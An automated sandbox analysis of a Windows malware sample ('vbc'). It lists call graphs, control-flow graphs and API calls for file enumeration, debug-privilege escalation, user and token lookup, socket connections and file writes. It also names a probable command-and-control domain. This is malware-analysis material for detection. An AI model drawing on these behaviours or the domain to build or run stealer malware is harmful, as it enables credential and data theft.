9274 40e970 9273->9274 9275 405695 2 API calls 9274->9275 9275->9270 9277 4031e5 4 API calls 9276->9277 9278 4049c6 9277->9278 9278->9265 9278->9266 9279 4139de 9288 413855 9279->9288 9281 4139f1 9282 413838 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9281->9282 9283 4139f7 9282->9283 9284 413866 59 API calls 9283->9284 9285 413a2d 9284->9285 9286 413b81 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 9285->9286 9287 413a34 9286->9287 9289 4031e5 4 API calls 9288->9289 9290 413864 9289->9290 9290->9290 9915 4116e7 9916 4117ba 9915->9916 9917 4117f1 9916->9917 9918 405b6f 6 API calls 9916->9918 9919 4117d0 9918->9919 9919->9917 9920 404cbf 8 API calls 9919->9920 9921 4117eb 9920->9921 9922 402bab 2 API calls 9921->9922 9922->9917 9310 4094e7 9311 404b22 6 API calls 9310->9311 9312 4094fe 9311->9312 9313 409554 9312->9313 9314 405b6f 6 API calls 9312->9314 9315 409514 9314->9315 9317 404b22 6 API calls 9315->9317 9322 40954d 9315->9322 9316 402bab 2 API calls 9316->9313 9318 40952d 9317->9318 9319 409408 15 API calls 9318->9319 9324 409544 9318->9324 9321 40953e 9319->9321 9320 402bab 2 API calls 9320->9322 9323 402bab 2 API calls 9321->9323 9322->9316 9323->9324 9324->9320 9333 4058ea 9334 4031e5 4 API calls 9333->9334 9335 4058fd StrStrA 9334->9335 9967 40d4ea 9968 404bee 6 API calls 9967->9968 9969 40d500 9968->9969 9970 40d5a0 9969->9970 9971 404bee 6 API calls 9969->9971 9972 40d529 9971->9972 9973 404bee 6 API calls 9972->9973 9974 40d537 9973->9974 9975 404bee 6 API calls 9974->9975 9976 40d546 9975->9976 9976->9970 9977 405872 4 API calls 9976->9977 9978 40d56d 9977->9978 9979 405872 4 API calls 9978->9979 9980 40d57c 9979->9980 9981 405872 4 API calls 9980->9981 9982 40d58e 9981->9982 9983 405872 4 API calls 9982->9983 9983->9970 9984 40a3ea 9985 40374e 6 API calls 9984->9985 9986 40a403 9985->9986 9987 40a419 9986->9987 9988 4059d8 4 API calls 9986->9988 9989 40a411 9988->9989 9990 402bab 2 API calls 9989->9990 9990->9987 9373 404df3 WSAStartup 9377 4091f6 9378 404b22 6 API calls 9377->9378 9379 40920b 9378->9379 9380 409222 9379->9380 9381 409408 15 API calls 9379->9381 9382 40921c 9381->9382 9383 402bab 2 API calls 9382->9383 9383->9380 10017 4117fe 10018 404c4e 6 API calls 10017->10018 10019 411888 10018->10019 10020 404c4e 6 API calls 10019->10020 10022 411925 10019->10022 10021 4118ab 10020->10021 10021->10022 10036 4119b3 10021->10036 10024 4118c5 10025 4119b3 4 API calls 10024->10025 10026 4118d0 10025->10026 10026->10022 10027 4056bf 2 API calls 10026->10027 10028 4118fd 10027->10028 10029 405872 4 API calls 10028->10029 10030 41190a 10029->10030 10031 405872 4 API calls 10030->10031 10032 411915 10031->10032 10033 413aca 4 API calls 10032->10033 10034 41191f 10033->10034 10035 405695 2 API calls 10034->10035 10035->10022 10037 4119c6 10036->10037 10039 4119bf 10036->10039 10038 4031e5 4 API calls 10037->10038 10038->10039 10039->10024 9387 40e880 9388 41219c 14 API calls 9387->9388 9389 40e88e 9388->9389 9390 41219c 14 API calls 9389->9390 9391 40e89c 9390->9391 10103 40e48a 10104 404bee 6 API calls 10103->10104 10106 40e4d0 10104->10106 10105 40e4f4 10106->10105 10107 405872 4 API calls 10106->10107 10107->10105 9488 410390 9489 404b22 6 API calls 9488->9489 9490 4103a5 9489->9490 9491 410409 9490->9491 9492 405b6f 6 API calls 9490->9492 9496 4103ba 9492->9496 9493 410402 9494 402bab 2 API calls 9493->9494 9494->9491 9495 402bab 2 API calls 9495->9493 9496->9493 9497 403d74 19 API calls 9496->9497 9500 4103fb 9496->9500 9498 4103ee 9497->9498 9499 402bab 2 API calls 9498->9499 9498->9500 9499->9500 9500->9495 10118 40ed96 10119 4040bb 12 API calls 10118->10119 10133 40edb0 10119->10133 10120 40ef90 10121 40ef87 10122 403f9e 5 API calls 10121->10122 10122->10120 10123 405ae9 6 API calls 10123->10133 10124 412269 6 API calls 10124->10133 10125 40ef61 10127 40ef6e 10125->10127 10129 402bab 2 API calls 10125->10129 10126 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 10126->10133 10128 40ef7c 10127->10128 10130 402bab 2 API calls 10127->10130 10128->10121 10131 402bab 2 API calls 10128->10131 10129->10127 10130->10128 10131->10121 10132 402bab GetProcessHeap HeapFree 10132->10133 10133->10120 10133->10121 10133->10123 10133->10124 10133->10125 10133->10126 10133->10132 10134 40ef98 10135 404c4e 6 API calls 10134->10135 10136 40efb6 10135->10136 10137 40f02a 10136->10137 10149 40f054 10136->10149 10140 404bee 6 API calls 10141 40efda 10140->10141 10142 404bee 6 API calls 10141->10142 10143 40efe9 10142->10143 10143->10137 10144 405872 4 API calls 10143->10144 10145 40f008 10144->10145 10146 405872 4 API calls 10145->10146 10147 40f01a 10146->10147 10148 405872 4 API calls 10147->10148 10148->10137 10150 40f064 10149->10150 10151 402b7c 2 API calls 10150->10151 10153 40f072 10151->10153 10152 40efca 10152->10140 10153->10152 10155 405ecd 10153->10155 10156 4059b8 4 API calls 10155->10156 10157 405edf 10156->10157 10157->10153 9507 410c98 9508 41219c 14 API calls 9507->9508 9509 410ca8 9508->9509 9510 41219c 14 API calls 9509->9510 9511 410cb5 9510->9511 9512 412093 20 API calls 9511->9512 9513 410cc9 9512->9513 10227 41249c 10228 4056bf 2 API calls 10227->10228 10229 4124aa 10228->10229 10230 4057df 13 API calls 10229->10230 10235 4124ce 10229->10235 10231 4124be 10230->10231 10232 413aca 4 API calls 10231->10232 10233 4124c8 10232->10233 10234 405695 2 API calls 10233->10234 10234->10235 9517 40f49e 9518 40f4b6 13 API calls 9517->9518 9519 40f4a8 9518->9519 9520 40929e 9521 413b28 6 API calls 9520->9521 9522 4092a4 9521->9522 9523 405b6f 6 API calls 9522->9523 9524 4092af 9523->9524 9525 4092c5 9524->9525 9526 409408 15 API calls 9524->9526 9527 4092bf 9526->9527 9528 402bab 2 API calls 9527->9528 9528->9525 10254 407fa4 10255 407fb7 10254->10255 10256 402b7c 2 API calls 10255->10256 10258 407fee 10255->10258 10257 40800d 10256->10257 10257->10258 10259 4037be 4 API calls 10257->10259 10260 40803c 10259->10260 10261 402bab 2 API calls 10260->10261 10261->10258 9565 4090aa 9566 404b22 6 API calls 9565->9566 9567 4090c1 9566->9567 9568 4090d8 9567->9568 9569 409408 15 API calls 9567->9569 9570 404b22 6 API calls 9568->9570 9571 4090d2 9569->9571 9572 4090eb 9570->9572 9573 402bab 2 API calls 9571->9573 9574 408c4d 15 API calls 9572->9574 9577 409104 9572->9577 9573->9568 9575 4090fe 9574->9575 9576 402bab 2 API calls 9575->9576 9576->9577 9584 409cae 9599 404b79 9584->9599 9586 409cc5 9587 409d27 9586->9587 9588 405b6f 6 API calls 9586->9588 9590 409d2f 9586->9590 9589 402bab 2 API calls 9587->9589 9591 409cec 9588->9591 9589->9590 9591->9587 9592 404b79 6 API calls 9591->9592 9593 409d05 9592->9593 9594 409d1e 9593->9594 9595 408c4d 15 API calls 9593->9595 9596 402bab 2 API calls 9594->9596 9597 409d18 9595->9597 9596->9587 9598 402bab 2 API calls 9597->9598 9598->9594 9600 404b22 6 API calls 9599->9600 9601 404b8a 9600->9601 9601->9586 10321 411fb3 10322 405b6f 6 API calls 10321->10322 10324 412013 10322->10324 10323 412075 10324->10323 10339 41206a 10324->10339 10340 411a8d 10324->10340 10326 402bab 2 API calls 10326->10323 10328 4056bf 2 API calls 10329 41203d 10328->10329 10330 405872 4 API calls 10329->10330 10331 41204a 10330->10331 10332 413aca 4 API calls 10331->10332 10333 412054 10332->10333 10334 405695 2 API calls 10333->10334 10335 41205a 10334->10335 10336 413a58 13 API calls 10335->10336 10337 412064 10336->10337 10338 402bab 2 API calls 10337->10338 10338->10339 10339->10326 10341 402b7c 2 API calls 10340->10341 10342 411aa3 10341->10342 10350 411f05 10342->10350 10363 404ada 10342->10363 10345 404ada 4 API calls 10346 411cad 10345->10346 10347 411f0c 10346->10347 10348 411cc0 10346->10348 10349 402bab 2 API calls 10347->10349 10366 405eb6 10348->10366 10349->10350 10350->10328 10350->10339 10352 411d3c 10353 4031e5 4 API calls 10352->10353 10361 411d7b 10353->10361 10354 411ea6 10355 4031e5 4 API calls 10354->10355 10356 411eb5 10355->10356 10357 4031e5 4 API calls 10356->10357 10358 411ed6 10357->10358 10359 405eb6 4 API calls 10358->10359 10359->10350 10360 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10360->10361 10361->10354 10361->10360 10362 405eb6 4 API calls 10361->10362 10362->10361 10364 4031e5 4 API calls 10363->10364 10365 404afd 10364->10365 10365->10345 10367 405998 4 API calls 10366->10367 10368 405ec8 10367->10368 10368->10352 9631 40f6b8 9632 41219c 14 API calls 9631->9632 9633 40f6c7 9632->9633 9634 41219c 14 API calls 9633->9634 9635 40f6d5 9634->9635 9636 41219c 14 API calls 9635->9636 9637 40f6df 9636->9637 9656 40d6bd 9657 4056bf 2 API calls 9656->9657 9658 40d6c9 9657->9658 9669 404cbf 9658->9669 9661 404cbf 8 API calls 9662 40d6f4 9661->9662 9663 404cbf 8 API calls 9662->9663 9664 40d702 9663->9664 9665 413aca 4 API calls 9664->9665 9666 40d711 9665->9666 9667 405695 2 API calls 9666->9667 9668 40d71f 9667->9668 9670 402b7c 2 API calls 9669->9670 9671 404ccd 9670->9671 9672 404ddc 9671->9672 9673 404b8f 5 API calls 9671->9673 9672->9661 9674 404ce4 9673->9674 9675 404dd4 9674->9675 9677 402b7c 2 API calls 9674->9677 9676 402bab 2 API calls 9675->9676 9676->9672 9684 404d04 9677->9684 9678 404dcc 9679 404a39 5 API calls 9678->9679 9679->9675 9680 404dc6 9682 402bab 2 API calls 9680->9682 9681 402b7c 2 API calls 9681->9684 9682->9678 9683 404b8f 5 API calls 9683->9684 9684->9678 9684->9680 9684->9681 9684->9683 9685 402bab GetProcessHeap HeapFree 9684->9685 9686 404a39 5 API calls 9684->9686 9687 405b6f 6 API calls 9684->9687 9688 404cbf 8 API calls 9684->9688 9685->9684 9686->9684 9687->9684 9688->9684 9689 40f0bf 9690 4056bf 2 API calls 9689->9690 9691 40f0c9 9690->9691 9692 40f115 9691->9692 9694 404cbf 8 API calls 9691->9694 9693 41219c 14 API calls 9692->9693 9695 40f128 9693->9695 9696 40f0ed 9694->9696 9697 404cbf 8 API calls 9696->9697 9698 40f0fb 9697->9698 9699 413aca 4 API calls 9698->9699 9700 40f10a 9699->9700 9701 405695 2 API calls 9700->9701 9701->9692

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 159 403dd1-403dd8 151->159 160 403e9d-403ea4 call 402bab 151->160 154 403f97-403f9d 152->154 161 403ee8-403ef8 call 405d24 153->161 162 403f8e-403f94 call 402bab 153->162 166 403e75-403e90 call 4031e5 FindNextFileW 159->166 167 403dde-403de2 159->167 160->150 175 403f03-403f0a 161->175 176 403efa-403f01 161->176 162->152 166->159 179 403e96-403e97 call 403bef 166->179 172 403e12-403e22 call 405d24 167->172 173 403de4-403df9 call 405eff 167->173 188 403e30-403e4c call 405b6f 172->188 189 403e24-403e2e 172->189 173->166 185 403dfb-403e10 call 405eff 173->185 181 403f12-403f2d call 405b6f 175->181 182 403f0c-403f10 175->182 176->175 180 403f41-403f5c call 4031e5 FindNextFileW 176->180 193 403e9c 179->193 196 403f87-403f88 call 403bef 180->196 197 403f5e-403f61 180->197 181->180 199 403f2f-403f33 181->199 182->180 182->181 185->166 185->172 188->166 203 403e4e-403e6f call 403d74 call 402bab 188->203 189->166 189->188 193->160 207 403f8d 196->207 197->161 201 403f75-403f85 call 402bab call 403bef 199->201 202 403f35-403f36 call 40fa23 199->202 201->154 209 403f39-403f40 call 402bab 202->209 203->166 217 403f63-403f73 call 402bab call 403bef 203->217 207->162 209->180 217->154
                                    APIs
                                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                    • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                    • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileFind$FirstNext
                                    • String ID: %s\%s$%s\*$Program Files$Windows
                                    • API String ID: 1690352074-2009209621
                                    • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                    • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                    • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                    • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                    APIs
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                    • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                    • String ID: SeDebugPrivilege
                                    • API String ID: 3615134276-2896544425
                                    • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                    • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                    • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                    • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                    • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcess
                                    • String ID:
                                    • API String ID: 1357844191-0
                                    • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                    • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                    • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                    • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                    APIs
                                    • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: NameUser
                                    • String ID:
                                    • API String ID: 2645101109-0
                                    • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                    • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                                    • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                    • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                                    APIs
                                    • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: recv
                                    • String ID:
                                    • API String ID: 1507349165-0
                                    • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                    • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                    • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                    • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 231 406201-406203 229->231 232 406208-406228 call 4060ac call 4031e5 229->232 238 40624c-406258 call 402b7c 230->238 239 40623d-406249 call 40338c 230->239 234 406329-40632e 231->234 232->230 232->231 246 406269-406290 call 4031e5 GetTokenInformation 238->246 247 40625a-406266 call 40338c 238->247 239->238 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 265 4062a2-4062b9 call 406086 253->265 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 266 40630c 256->266 258 406311-406317 call 402bab 257->258 259 406318-40631e 257->259 258->259 263 406320-406326 call 402bab 259->263 264 406327 259->264 263->264 264->234 272 4062f5-4062fd call 402bab 265->272 273 4062bb-4062df call 4031e5 265->273 266->257 272->254 278 4062e2-4062e4 273->278 278->272 279 4062e6-4062f3 call 405b6f 278->279 279->272
                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                    • _wmemset.LIBCMT ref: 00406244
                                    • _wmemset.LIBCMT ref: 00406261
                                    • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _wmemset$ErrorInformationLastToken
                                    • String ID: IDA$IDA
                                    • API String ID: 487585393-2020647798
                                    • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                    • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                    • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                                    • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 552 404ec7-404ec9 542->552 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 549 404ec0-404ec6 call 402bab 545->549 550 404ecb 545->550 546->545 549->552 551 404ecd-404ece 550->551 551->539 552->551
                                    APIs
                                    • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                    • socket.WS2_32(?,?,?), ref: 00404E7A
                                    • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: freeaddrinfogetaddrinfosocket
                                    • String ID:
                                    • API String ID: 2479546573-0
                                    • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                    • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                    • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                                    • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 570 404113-404119 559->570 571 40417a 559->571 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 569 4041a9-4041b8 call 403c59 562->569 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 569->576 577 4041db-4041e4 call 402bab 569->577 570->571 575 40411b-404120 570->575 574 40417d-40417e call 403c40 571->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->571 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$AllocCreateReadVirtual
                                    • String ID: .tmp
                                    • API String ID: 3585551309-2986845003
                                    • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                    • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                    • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                    • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                    APIs
                                    • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                    • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                    • GetLastError.KERNEL32 ref: 0041399E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Error$CreateLastModeMutex
                                    • String ID:
                                    • API String ID: 3448925889-0
                                    • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                    • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                    • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                    • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                    • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CreatePointerWrite
                                    • String ID:
                                    • API String ID: 3672724799-0
                                    • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                    • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                    • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                    • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                    APIs
                                    • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                      • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                      • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                      • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_vbc.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$CreateFreeProcessThread_wmemset
                                    • String ID: ckav.ru
                                    • API String ID: 2915393847-2696028687
                                    • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                    • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                    • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                    • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                    APIs
                                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                    • _wmemset.LIBCMT ref: 0040634F
